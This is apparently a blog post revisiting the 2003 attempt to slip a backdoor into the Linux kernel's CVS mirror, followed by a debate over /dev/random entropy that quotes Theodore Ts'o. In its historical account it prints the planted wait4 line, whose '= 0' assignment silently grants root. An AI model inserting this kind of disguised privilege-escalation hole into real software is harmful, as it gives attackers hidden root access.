Linux Backdoors Revisited (New Revelations and Old Revelations)

Dr. Roy Schestowitz

2013-10-16 15:43:24 UTC
Modified: 2013-10-16 15:43:24 UTC

Claude Elwood Shannon, the man who introduced entropy

Claude Elwood Shannon

Summary: An anonymous backdooring attempt against Linux goes a decade back, but a randomisation problem in today's Linux also seems possible (subverting encryption)

Jonathan Allen wrote this article about an incident mentioned also by Freedom to Tinker. Slashdot's summary goes like this, documenting news from one decade ago:

"Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn't like BitKeeper, so a second copy of the source code was kept in CVS. On November 5, 2003, Larry McAvoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...' A casual reading makes it look like innocuous error-checking code, but a careful reader would notice that, near the end of the first line, it said '= 0' rather than '== 0' so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it's a classic backdoor. We don't know who it was that made the attempt—and we probably never will. But the attempt didn't work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. 'Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack,' writes Felton. 'Unless somebody confesses, or a smoking-gun document turns up, we'll never know.'"

Backdoors in Linux are a subject for jokes in Torvalds' mind, but given the above we should take this subject very seriously. In any system, for example, having no mechanism for randomness (like in some embedded devices) typically means that strong encryption (with high entropy) is not possible. Given new alleged "insecurities in the Linux /dev/random," as Bruce Schneier put it, Linux backdoors seem possible again. David Benfell said:

I'm guessing Schneier knows what the fuck he's talking about. If it is the same vulnerability, then Torvalds' defense is that the vulnerable source of entropy is only one of many. But if I read Schneier correctly, the result was still too predictable.

"On the other hand," says Benfell, "here's Theodore T'so from the comments:"

So I'm the maintainer for Linux's /dev/random driver. I've only had a chance to look at the paper very quickly, and I will at it more closely when I have more time, but what the authors of this paper seem to be worried about is not even close to the top of my list in terms of things I'm worried about.

First of all, the paper is incorrect in some minor details; the most significant error is its (untrue) claim that we stop gathering entropy when the entropy estimate for a given entropy pool is "full". Before July 2012, we went into a trickle mode where we only took in 1 in 096 values. Since then, the main way that we gather entropy, which is via add_interrupt_randomness(), has no such limit. This means that we will continue to collect entropy even if the input pool is apparently "full".

This is critical, because *secondly* their hypothetical attacks presume certain input distributions which have an incorrect entropy estimate ---| that is, either zero actual entropy but a high entropy estimate, or a high entropy, but a low entropy estimate. There has been no attempt by the paper's authors to determine whether the entropy gathered by Linux meets either of their hypothetical models, and in fact in the "Linux Pseudorandom Number Generator Revisited"[1], the analysis showed that our entropy estimator was actually pretty good, given the real-life inputs that we are able to obtain from an actual running Linux system.

[1]http://eprint.iacr.org/2012/251.pdf

The main thing which I am much more worried about is that on various embedded systems, which do not have a fine-grained clock, and which is reading from flash which has a much more deterministic timing for their operations, is that when userspace tries to generate long-term public keys immediately after the machine is taken out of the box and plugged in, that there isn't a sufficient amount of entropy, and since most userspace applications use /dev/urandom since they don't want to block, that they end up with keys that aren't very random. We had some really serious problems with this, which was written up in the "Mining Your Ps and Qs: Detection of Widespread Weak Keys in Network Devices" [2]paper, and the changes made in July 2012 were specifically designed to address these worries.

[2]https://www.factorable.net/paper.html

However, it may be that on certain systems, in particular ARM and MIPS based systems, where a long-term public key is generated very shortly after the first power-on, that there's enough randomness that the techniques used in [2]would not find any problems, but that might be not enough randomness to prevent our friends in Fort Meade from being able to brute force guess the possible public-private key pairs.

Speaking more generally, I'm a bit dubious about academic analysis which are primarily worried about recovering from the exposure of the state of the random pool. In practice, if the bad guy can grab the state of random pool, they probably have enough privileged access that they can do many more entertaining things, such as grabbing the user's passphrase or their long-term private key. Trying to preserve the amount of entropy in the pool, and making sure that we can extract as much uncertainty from the system as possible, are much higher priority things to worry about.

That's not to say that I might not make changes to /dev/random in reaction to academic analysis; I've made changes in reaction to [2], and I have changes queued for the next major kernel release up to make some changes to address concerns raised in [1]. However, protection against artificially constructed attacks is not the only thing which I am worried about. Things like making sure we have adequate entropy collection on all platforms, especially embedded ones, and adding some conservatism just in case SHA isn't a perfect random function are some of the other things which I am trying to balance as we make changes to /dev/random.

T'so, who is the former CTO of the Linux Foundation, at least acknowledges the possibility that there is a real issue here. ⬆

Linux Backdoors Revisited (New Revelations and Old Revelations)

Recent Techrights' Posts